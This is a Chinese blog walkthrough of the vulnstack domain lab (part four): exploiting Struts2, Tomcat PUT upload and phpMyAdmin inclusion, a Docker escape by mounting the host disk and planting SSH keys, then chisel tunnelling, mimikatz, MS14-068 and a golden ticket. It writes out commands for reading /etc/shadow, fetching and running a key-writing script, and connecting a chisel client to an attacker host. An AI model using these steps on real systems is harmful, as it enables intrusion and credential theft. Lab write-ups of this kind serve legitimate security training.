vulnstack域环境靶场(四)

2023-10-26

环境搭建

在这里插入图片描述
进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下:

sudo su
ubuntu
docker-compose build
docker-compose up

环境全部开启效果如下:
在这里插入图片描述

操作详情

通过nmap发现主机开启以下服务
在这里插入图片描述
端口2001是考察的str2的框架漏洞,使用工具进行验证并上传shell进行连接。
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
端口2002是Tomcat/8.5.19是CVE-2017-12615,使用PUT方法进行上传文件,然后连接shell。
在这里插入图片描述在这里插入图片描述在这里插入图片描述
端口2003是phpmyadmin版本号是4.8.1,存在任意文件包含漏洞
在这里插入图片描述
在这里插入图片描述
三个端口的漏洞都利用完毕,下步拿下域内pc以及域控,使用ssh密钥进行docker逃逸。
利用kali的searchsploit搜索Tomcat的poc,新建一个文件夹key,将poc复制到keys下,进行验证并上传shell
在这里插入图片描述
找到对应的版本漏洞
在这里插入图片描述将poc复制到key文件下,使用python进行验证
在这里插入图片描述在这里插入图片描述在这里插入图片描述
然后访问pwn.jsp
在这里插入图片描述
使用密钥建立用户然后docker逃逸
ls /dev
在这里插入图片描述
mkdir /test
mount /dev/sda1 /test
ls -alh /test
在这里插入图片描述
ls -alh /test/home/ubuntu/.ssh/
在这里插入图片描述
在当前目录下生成一个密钥,然后创建一个命令执行脚本
在这里插入图片描述
复制test.pub的内容到key.sh里
在这里插入图片描述
在这里插入图片描述使用python开启web服务器,然后用wget进行下载key.sh
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
赋予key.sh权限,执行以后查看.ssh目录是否写入了authorized_keys
chmod 777 key.sh
./key.sh
ls -alh /test/home/ubuntu/.ssh
在这里插入图片描述在这里插入图片描述
使用密钥查看是否能登录机器
在这里插入图片描述
再写一个命令脚本进行创建文件并输出密钥
在这里插入图片描述
查看本机kali的密码
cat /etc/shadow
在这里插入图片描述
查看sudoers
在这里插入图片描述
写好以后,使用wget进行下载
在这里插入图片描述chmod 777 add.sh
./add.sh

写入成功
在这里插入图片描述
本地文件夹一共有以下文件,现在进行登录服务器,断网了重启了一下ip变了~~
在这里插入图片描述
在这里插入图片描述
到这docker就逃逸成功了,下面进行内网渗透
下载chisel
在Ubuntu里使用wget 下载chisel,然后开启服务端
./chisel_1.7.3_linux_amd64 server -p 4545 --sockc5
在这里插入图片描述./chisel_1.7.3_linux_amd64 client 192.168.157.131:4545 socks
在这里插入图片描述进入msfconsole
在这里插入图片描述
成功打入,进行域内信息搜集
在这里插入图片描述在这里插入图片描述
获取域内信息
在这里插入图片描述
Domain Computers:
\TESTWIN7-PC
\WIN-ENS2VR5TR3N
在这里插入图片描述
切换到user权限
在这里插入图片描述
Domain controllers:
WIN-ENS2VR5TR3N
在这里插入图片描述
域名:demo.com
在这里插入图片描述

域管账户:Administrator
在这里插入图片描述
获取域内用户
在这里插入图片描述
寻找域控ip:192.168.183.130
在这里插入图片描述

获取sid
user uid:
S-1-5-21-979886063-1111900045-1414766810-1107

domain uid:
S-1-5-21-979886063-1111900045-1414766810

在这里插入图片描述

返回meterpreter,回到system权限使用mimikatz抓取密码
在这里插入图片描述
在这里插入图片描述

进入到shell,桌面有工具利用ms14-068
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
使用命令关闭防火墙
在这里插入图片描述
生成一个exe的后门,并上传至根目录

在这里插入图片描述
将win7的update.exe复制到域控机器
在这里插入图片描述
创建服务成功,开启防火墙,运行update,设置监听
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

设置msf的监听
在这里插入图片描述
成功拿到meterpreter
在这里插入图片描述
将权限变为administrator,然后加载kiwi,获取NTLM Hash
在这里插入图片描述
回到win7的session,将票据给清空,再生产黄金票据。
在这里插入图片描述在这里插入图片描述

写的比较杂乱,大佬勿喷,有什么问题请留言!

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

vulnstack域环境靶场(四) 的相关文章

  • 时序预测

    时序预测 MATLAB实现AR时间序列预测 目录 时序预测 MATLAB实现AR时间序列预测 基本介绍 程序设计 学习总结 参考资料 基本介绍 如果某个时间序列的任意数值可以表示自回归方程 那么该时间序列服从p阶的自回归过程 可以表示为AR
  • stable diffusion实践操作-常见lora模型介绍

    系列文章目录 本文专门开一节写Lora相关的内容 在看之前 可以同步关注 stable diffusion实践操作 文章目录 系列文章目录 前言 一 什么是lora 1 1 lora 定义 1 2 lora的基本原理 1 2 通过分层控制l
  • 面向对象(带参实例)——加减乘除运算

    实现加减乘除运算 代码如下 public class Daican int num1 int num2 public double cal String opr public double cal String opr int num1 i
  • 《信号与系统学习笔记》—信号与系统的时域和频域特性(二)

    注 本博客是基于奥本海姆 信号与系统 第二版编写 主要是为了自己学习的复习与加深 一 一阶与二阶连续时间系统 一 一阶连续时间系统 1 对于一个一阶系统 其微分方程往往表示成下列形式 区中t是一个系数 相应的一阶系统的频率响应是 其单位冲激
  • 锁的升级过程

    再此之前我们需要先了解一下什么是cas和aba 一 CAS 我们使用多线程来访问一个变量的时候 会出现相应的并发的情况 所以我们需要对这个变量进行加锁操作 但是我们也可以不进行加锁 我们先将查询到了的变量值放到内存中 然后将相应的然后我们要
  • ROS的ros_canopen调试

    Ros canopen是ros支持can通信的package 链接 http wiki ros org ros canopen distro indigo Ros canopen包结构如下 SocketCAN是一组开源的CAN驱动程序和网络
  • Linux内核中网络数据包的接收, 涉及到select/poll/epoll

    转自 https blog csdn net dog250 article details 50528280 与网络数据包的发送不同 网络收包是异步的的 因为你不确定谁会在什么时候突然发一个网络包给你 因此这个网络收包逻辑其实包含两件事 1
  • mysql 登录hang_MySQL客户端连接登入hang住原因分析

    作者 八怪 高鹏 中亦科技数据库专家 原文 https www jianshu com p 93b69955344b 一 问题来源 问题来自一位朋友 如下 mysql客户端无法登陆 查看服务器负载没有发现高负载信息 通过pstack查看线程
  • 普通人是否能从ChatGPT中分一杯羹?

    ChatGPT3 0刚刚推出 最开始的时候 人们只是将ChatGPT看作一个很会聊天的机器人 无论问题多么天马行空 它的答案看上去都有理有据 后来 像打开潘多拉魔盒一样 很多人开始拿它编大纲 撰写文案 编代码 创作剧本 写法律文书 还可以出
  • 服务器数据库怎么导入数据库文件路径,服务器数据库导入sql文件路径

    服务器数据库导入sql文件路径 内容精选 换一换 下载MySQL源码包 includes Boost Headers cd home wget https dev mysql com get Downloads MySQL 5 7 mysq
  • 多个线程访问共享对象和数据的方式

    一 如果每个线程执行的代码相同 可以使用同一个Runnable 对象 这个Runnable对象中有那个共享的数据 例如买票系统就可以这样做 代码如下 package com thread class ShareDataTest1 publi
  • 编译器架构的王者LLVM——(9)栈式符号表的构建

    LLVM平台 短短几年间 改变了众多编程语言的走向 也催生了一大批具有特色的编程语言的出现 不愧为编译器架构的王者 也荣获2012年ACM软件系统奖 题记 版权声明 本文为 西风逍遥游 原创文章 转载请注明出处 西风世界 http blog
  • Centos升级openssh的正确方式

    准备工作 升级ssh可能会造成服务器无法连接 如果不能直接操作服务器 请开启telnet或者vnc 查看openssl版本 openssl version 在这里下载1 0 2版本 https www openssl org source
  • Spring的AOP五大通知注解

    通知注解 声明方法 在方法前加入通知注解 指定要拦截的对象信息 注意 代表任意修饰符号 任意值 AOP五大通知注解 Before 前置通知 在方法执行之前执行 After 后置通知 在方法执行之后执行 无论是否发生异常 还不能访问目标方法执
  • C++复合模式:Compound Pattern

    模式通常被一起使用 并被组合在同一个设计解决方案中 复合模式在一个解决方案中结合两个或多个模式 以解决一般或重复发生的问题 注 是为了解决一般或重复发生的问题 而不是简单的认为使用了多个模式就是复合模式 绝不要为了使用模式而使用模式 具体问
  • 基于 Flask 的简易 Mock 平台

    https testerhome com topics 14753
  • Linux——md5命令

    文章目录 介绍 选项 使用案例 生成文件md5值 文本模式或二进制模式 md5值重定向 重定向追加 md5校验 实际开发场景 介绍 md5sum命令用于生成和校验文件的md5值 它会逐位对文件的内容进行校验 是文件的内容 与文件名无关 也就

随机推荐